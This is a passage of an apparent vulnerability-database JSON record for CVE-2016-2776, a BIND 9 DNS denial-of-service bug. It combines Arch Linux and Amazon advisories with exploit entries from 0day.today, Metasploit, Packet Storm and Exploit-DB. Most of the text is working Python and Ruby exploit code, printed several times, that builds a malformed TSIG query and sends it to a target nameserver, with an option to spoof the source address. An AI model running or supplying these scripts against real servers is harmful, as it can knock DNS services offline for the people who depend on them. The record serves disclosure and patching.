before version 9.10.4.P3-1 is vulnerable to denial of\nservice.\n\nResolution\n==========\n\nUpgrade to 9.10.4.P3-1.\n\n# pacman -Syu \"bind>=9.10.4.P3-1\"\n\nThe problem has been fixed upstream in version 9.10.4.P3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nTesting by ISC has uncovered a critical error condition which can occur\nwhen a nameserver is constructing a response. A defect in the\nrendering of messages into packets can cause 'named' to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.\nThis assertion can be triggered even if the apparent source address\nisn't allowed to make queries (i.e. doesn't match 'allow-query').\n\nImpact\n======\n\nA remote attacker is able to perform a denial of service attack via a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://kb.isc.org/article/AA-01419/0\nhttps://access.redhat.com/security/cve/CVE-2016-2776", "modified": "2016-09-27T00:00:00", "published": "2016-09-27T00:00:00", "id": "ASA-201609-29", "href": "https://security.archlinux.org/ASA-201609-29", "type": "archlinux", "title": "[ASA-201609-29] bind: denial of service", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**Issue Overview:**\n\nA denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.\n\n \n**Affected Packages:** \n\n\nbind\n\n \n**Issue Correction:** \nRun _yum update bind_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n bind-libs-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-sdb-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-utils-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-devel-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-chroot-9.8.2-0.37.rc1.48.amzn1.i686 \n \n src: \n bind-9.8.2-0.37.rc1.48.amzn1.src \n \n x86_64: \n bind-sdb-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-chroot-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-libs-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-devel-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-utils-9.8.2-0.37.rc1.48.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-09-28T15:45:00", "published": "2016-09-28T15:45:00", "id": "ALAS-2016-751", "href": "https://alas.aws.amazon.com/ALAS-2016-751.html", "title": "Important: bind", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-01-01T07:18:27", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2016-10-04T00:00:00", "type": "zdt", "title": "Bind 9 DNS Server - Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "1337DAY-ID-25325", "href": "https://0day.today/exploit/description/25325", "sourceData": "import socket\r\nimport struct\r\n \r\nTARGET = ('192.168.200.10', 53)\r\n \r\nQ_A = 1\r\nQ_TSIG = 250\r\nDNS_MESSAGE_HEADERLEN = 12\r\n \r\n \r\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\r\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\r\n \r\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\r\n tsig_rr = build_tsig_rr(sweet_spot)\r\n \r\n return query_A + tsig_rr\r\n \r\ndef int16(n):\r\n return struct.pack(\"!H\", n)\r\n \r\ndef 
build_tsig_rr(bind_demarshalled_size):\r\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\r\n \"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\r\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\r\n \r\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\r\n necessary_bytes += 2 + 2 # length fields\r\n \r\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\r\n # bind9 uses sizeof(TSIG RR) - 16 to build its own\r\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\r\n \r\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\r\n tsig_data = algo_name + signature_data\r\n return tsig_hdr + int16(len(tsig_data)) + tsig_data\r\n \r\ndef generate_padding(n):\r\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\r\n buckets = [1] * len(max_per_bucket)\r\n \r\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\r\n max_size = sum(max_per_bucket) + len(buckets) + 2\r\n \r\n if not(min_size <= n <= max_size):\r\n raise RuntimeException(\"unsupported amount of bytes\")\r\n \r\n curr_idx, n = 0, n - min_size\r\n while n > 0:\r\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\r\n buckets[curr_idx] = 1 + n - next_n\r\n n, curr_idx = next_n, curr_idx + 1\r\n \r\n n_padding = lambda amount: chr(amount) + \"A\" * amount\r\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\r\n \r\n return stringify(buckets[:4]), stringify(buckets[4:])\r\n \r\nif __name__ == \"__main__\":\r\n bombita = build_bind_nuke()\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.sendto(bombita, TARGET)\r\n s.close()\r\n \r\n'''\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'timeout'\r\nrequire 'socket'\r\n \r\nclass 
MetasploitModule < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n include Msf::Auxiliary::Report\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\r\n 'Description' => %q{\r\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\r\n Critical error condition which can occur when a nameserver is constructing a response.\r\n A defect in the rendering of messages into packets can cause named to exit with an\r\n assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\r\n \r\n This assertion can be triggered even if the apparent source address isnt allowed\r\n to make queries.\r\n },\r\n # Research and Original PoC - msf module author\r\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2776' ],\r\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\r\n ],\r\n 'DisclosureDate' => 'Sep 27 2016',\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\r\n ])\r\n \r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n \r\n def check_server_status(ip, rport)\r\n res = \"\"\r\n sudp = UDPSocket.new\r\n sudp.send(valid_query, 0, ip, rport)\r\n begin\r\n Timeout.timeout(5) do\r\n res = sudp.recv(100)\r\n end\r\n rescue Timeout::Error\r\n end\r\n \r\n if(res.length==0)\r\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\r\n else\r\n print_error(\"Exploit Failed\")\r\n end\r\n end\r\n \r\n def scan_host(ip)\r\n @flag_success = true\r\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\r\n scanner_send(payload, ip, rport)\r\n check_server_status(ip, rport)\r\n end\r\n 
\r\n def get_domain\r\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\r\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\r\n get_domain = domain+org\r\n end\r\n \r\n def payload\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x01\" # Additional RRs: 1\r\n \r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)\r\n \r\n # Aditional records. Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\r\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\r\n query += \"\\x00\"\r\n \r\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\r\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\r\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\r\n query += \"\\x00\\xfc\" # Data length: 252\r\n \r\n # Algorithm Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\r\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\r\n query += \"\\x00\"\r\n \r\n # Rest of TSIG\r\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\r\n query += \"\\x01\\x2c\" # Fudge: 300\r\n query += \"\\x00\\x10\" # MAC Size: 16\r\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\r\n query += \"\\x8f\\x65\" # Original Id: 36709\r\n query += \"\\x00\\x00\" # Error: No error (0)\r\n query += \"\\x00\\x00\" # Other len: 0\r\n end\r\n \r\n def valid_query\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += 
\"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x00\" # Additional RRs: 0\r\n \r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\r\n end\r\n \r\nend\r\n'''\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25325"}], "metasploit": [{"lastseen": "2020-10-07T20:39:38", "description": "A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isn't allowed to make queries.\n", "published": "2017-08-26T15:41:10", "type": "metasploit", "title": "BIND TSIG Query Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TSIG", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TSIG Query Denial of Service',\n 'Description' => %q{\n A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.\n },\n # Research and Original PoC - msf module author\n 'Author' => [\n 'Martin Rocha',\n 'Ezequiel Tavella',\n 'Alejandro Parodi',\n 
'Infobyte Research Team'\n ],\n 'References' => [\n ['CVE', '2016-2776'],\n ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']\n ],\n 'DisclosureDate' => '2016-09-27',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n # Domain Name\n query << get_domain # Random DNS Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x01\" # Type: A (Host Address) (1)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n # Additional records. 
Name\n query << (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\n query << \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\n query << \"\\x00\"\n\n query << \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\n query << \"\\x00\\xff\" # Class: ANY (0x00ff)\n query << \"\\x00\\x00\\x00\\x00\" # Time to live: 0\n query << \"\\x00\\xfc\" # Data length: 252\n\n # Algorithm Name\n query << (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\n query << \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\n query << \"\\x00\"\n\n # Rest of TSIG\n query << \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\n query << \"\\x01\\x2c\" # Fudge: 300\n query << \"\\x00\\x10\" # MAC Size: 16\n query << Rex::Text.rand_text_alphanumeric(16) # MAC\n query << \"\\x8f\\x65\" # Original Id: 36709\n query << \"\\x00\\x00\" # Error: No error (0)\n query << \"\\x00\\x00\" # Other len: 0\n end\n\n def get_domain\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\n domain+org\n end\nend\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tsig.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:58", "description": "", "published": "2016-10-04T00:00:00", "type": "packetstorm", "title": "BIND 9 DNS Server Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "PACKETSTORM:138960", "href": "https://packetstormsecurity.com/files/138960/BIND-9-DNS-Server-Denial-Of-Service.html", "sourceData": "`import socket \nimport struct \n \nTARGET = ('192.168.200.10', 53) \n \nQ_A = 1 \nQ_TSIG = 250 \nDNS_MESSAGE_HEADERLEN = 12 \n \n \ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512): \nquery_A = 
\"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\" \n \nsweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 \ntsig_rr = build_tsig_rr(sweet_spot) \n \nreturn query_A + tsig_rr \n \ndef int16(n): \nreturn struct.pack(\"!H\", n) \n \ndef build_tsig_rr(bind_demarshalled_size): \nsignature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\" \n\"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\") \ntsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\" \n \nnecessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) \nnecessary_bytes += 2 + 2 # length fields \n \n# from sizeof(TSIG RR) bytes conforming the TSIG RR \n# bind9 uses sizeof(TSIG RR) - 16 to build its own \nsign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) \n \ntsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields \ntsig_data = algo_name + signature_data \nreturn tsig_hdr + int16(len(tsig_data)) + tsig_data \n \ndef generate_padding(n): \nmax_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] \nbuckets = [1] * len(max_per_bucket) \n \nmin_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte \nmax_size = sum(max_per_bucket) + len(buckets) + 2 \n \nif not(min_size <= n <= max_size): \nraise RuntimeException(\"unsupported amount of bytes\") \n \ncurr_idx, n = 0, n - min_size \nwhile n > 0: \nnext_n = max(n - (max_per_bucket[curr_idx] - 1), 0) \nbuckets[curr_idx] = 1 + n - next_n \nn, curr_idx = next_n, curr_idx + 1 \n \nn_padding = lambda amount: chr(amount) + \"A\" * amount \nstringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\" \n \nreturn stringify(buckets[:4]), stringify(buckets[4:]) \n \nif __name__ == \"__main__\": \nbombita = build_bind_nuke() \n \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.sendto(bombita, TARGET) \ns.close() \n \n''' \n## \n# This module requires 
Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'timeout' \nrequire 'socket' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Capture \ninclude Msf::Auxiliary::UDPScanner \ninclude Msf::Auxiliary::Dos \ninclude Msf::Auxiliary::Report \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'BIND 9 DoS CVE-2016-2776', \n'Description' => %q{ \nDenial of Service Bind 9 DNS Server CVE-2016-2776. \nCritical error condition which can occur when a nameserver is constructing a response. \nA defect in the rendering of messages into packets can cause named to exit with an \nassertion failure in buffer.c while constructing a response to a query that meets certain criteria. \n \nThis assertion can be triggered even if the apparent source address isnt allowed \nto make queries. \n}, \n# Research and Original PoC - msf module author \n'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-2776' ], \n[ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] \n], \n'DisclosureDate' => 'Sep 27 2016', \n'DefaultOptions' => {'ScannerRecvWindow' => 0} \n)) \n \nregister_options([ \nOpt::RPORT(53), \nOptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) \n]) \n \nderegister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') \nend \n \ndef check_server_status(ip, rport) \nres = \"\" \nsudp = UDPSocket.new \nsudp.send(valid_query, 0, ip, rport) \nbegin \nTimeout.timeout(5) do \nres = sudp.recv(100) \nend \nrescue Timeout::Error \nend \n \nif(res.length==0) \nprint_good(\"Exploit Success (Maybe, nameserver did not replied)\") \nelse \nprint_error(\"Exploit Failed\") \nend \nend \n \ndef scan_host(ip) \n@flag_success = true \nprint_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip) 
\nscanner_send(payload, ip, rport) \ncheck_server_status(ip, rport) \nend \n \ndef get_domain \ndomain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6) \norg = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3) \nget_domain = domain+org \nend \n \ndef payload \nquery = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 \nquery += \"\\x00\\x00\" # Flags: 0x0000 Standard query \nquery += \"\\x00\\x01\" # Questions: 1 \nquery += \"\\x00\\x00\" # Answer RRs: 0 \nquery += \"\\x00\\x00\" # Authority RRs: 0 \nquery += \"\\x00\\x01\" # Additional RRs: 1 \n \n# Doman Name \nquery += get_domain # Random DNS Name \nquery += \"\\x00\" # [End of name] \nquery += \"\\x00\\x01\" # Type: A (Host Address) (1) \nquery += \"\\x00\\x01\" # Class: IN (0x0001) \n \n# Aditional records. Name \nquery += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes \nquery += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61) \nquery += \"\\x00\" \n \nquery += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250) \nquery += \"\\x00\\xff\" # Class: ANY (0x00ff) \nquery += \"\\x00\\x00\\x00\\x00\" # Time to live: 0 \nquery += \"\\x00\\xfc\" # Data length: 252 \n \n# Algorithm Name \nquery += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes \nquery += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes \nquery += \"\\x00\" \n \n# Rest of TSIG \nquery += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART \nquery += \"\\x01\\x2c\" # Fudge: 300 \nquery += \"\\x00\\x10\" # MAC Size: 16 \nquery += Rex::Text.rand_text_alphanumeric(16) # MAC \nquery += \"\\x8f\\x65\" # Original Id: 36709 \nquery += \"\\x00\\x00\" # Error: No error (0) \nquery += \"\\x00\\x00\" # Other len: 0 \nend \n \ndef valid_query \nquery = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 \nquery += \"\\x00\\x00\" # Flags: 0x0000 Standard query \nquery += \"\\x00\\x01\" # Questions: 1 \nquery += \"\\x00\\x00\" # Answer RRs: 0 
\nquery += \"\\x00\\x00\" # Authority RRs: 0 \nquery += \"\\x00\\x00\" # Additional RRs: 0 \n \n# Doman Name \nquery += get_domain # Random DNS Name \nquery += \"\\x00\" # [End of name] \nquery += \"\\x00\\x01\" # Type: A (Host Address) (1) \nquery += \"\\x00\\x01\" # Class: IN (0x0001)s \nend \n \nend \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138960/bind9dns-dos.txt"}], "exploitdb": [{"lastseen": "2016-10-04T21:29:05", "description": "Bind 9 DNS Server - Denial of Service. CVE-2016-2776. Dos exploit for Multiple platform", "published": "2016-10-04T00:00:00", "type": "exploitdb", "title": "Bind 9 DNS Server - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "EDB-ID:40453", "href": "https://www.exploit-db.com/exploits/40453/", "sourceData": "import socket\r\nimport struct\r\n\r\nTARGET = ('192.168.200.10', 53)\r\n\r\nQ_A = 1\r\nQ_TSIG = 250\r\nDNS_MESSAGE_HEADERLEN = 12\r\n\r\n\r\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\r\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\r\n\r\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\r\n tsig_rr = build_tsig_rr(sweet_spot)\r\n\r\n return query_A + tsig_rr\r\n\r\ndef int16(n):\r\n return struct.pack(\"!H\", n)\r\n\r\ndef build_tsig_rr(bind_demarshalled_size):\r\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\r\n \"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\r\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\r\n\r\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\r\n necessary_bytes += 2 + 2 # length fields\r\n\r\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\r\n # bind9 uses sizeof(TSIG RR) - 16 to build its 
own\r\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\r\n\r\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\r\n tsig_data = algo_name + signature_data\r\n return tsig_hdr + int16(len(tsig_data)) + tsig_data\r\n\r\ndef generate_padding(n):\r\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\r\n buckets = [1] * len(max_per_bucket)\r\n\r\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\r\n max_size = sum(max_per_bucket) + len(buckets) + 2\r\n\r\n if not(min_size <= n <= max_size):\r\n raise RuntimeException(\"unsupported amount of bytes\")\r\n\r\n curr_idx, n = 0, n - min_size\r\n while n > 0:\r\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\r\n buckets[curr_idx] = 1 + n - next_n\r\n n, curr_idx = next_n, curr_idx + 1\r\n\r\n n_padding = lambda amount: chr(amount) + \"A\" * amount\r\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\r\n\r\n return stringify(buckets[:4]), stringify(buckets[4:])\r\n\r\nif __name__ == \"__main__\":\r\n bombita = build_bind_nuke()\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.sendto(bombita, TARGET)\r\n s.close()\r\n\r\n'''\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'timeout'\r\nrequire 'socket'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\r\n 'Description' => %q{\r\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\r\n Critical error condition which can occur when a nameserver is constructing a response.\r\n A defect in the rendering of messages into packets can cause named to exit with an\r\n 
assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\r\n\r\n This assertion can be triggered even if the apparent source address isnt allowed\r\n to make queries.\r\n },\r\n # Research and Original PoC - msf module author\r\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2776' ],\r\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\r\n ],\r\n 'DisclosureDate' => 'Sep 27 2016',\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\r\n ])\r\n\r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n\r\n def check_server_status(ip, rport)\r\n res = \"\"\r\n sudp = UDPSocket.new\r\n sudp.send(valid_query, 0, ip, rport)\r\n begin\r\n Timeout.timeout(5) do\r\n res = sudp.recv(100)\r\n end\r\n rescue Timeout::Error\r\n end\r\n\r\n if(res.length==0)\r\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\r\n else\r\n print_error(\"Exploit Failed\")\r\n end\r\n end\r\n\r\n def scan_host(ip)\r\n @flag_success = true\r\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\r\n scanner_send(payload, ip, rport)\r\n check_server_status(ip, rport)\r\n end\r\n\r\n def get_domain\r\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\r\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\r\n get_domain = domain+org\r\n end\r\n\r\n def payload\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x01\" # Additional RRs: 1\r\n\r\n # Doman Name\r\n query += get_domain # 
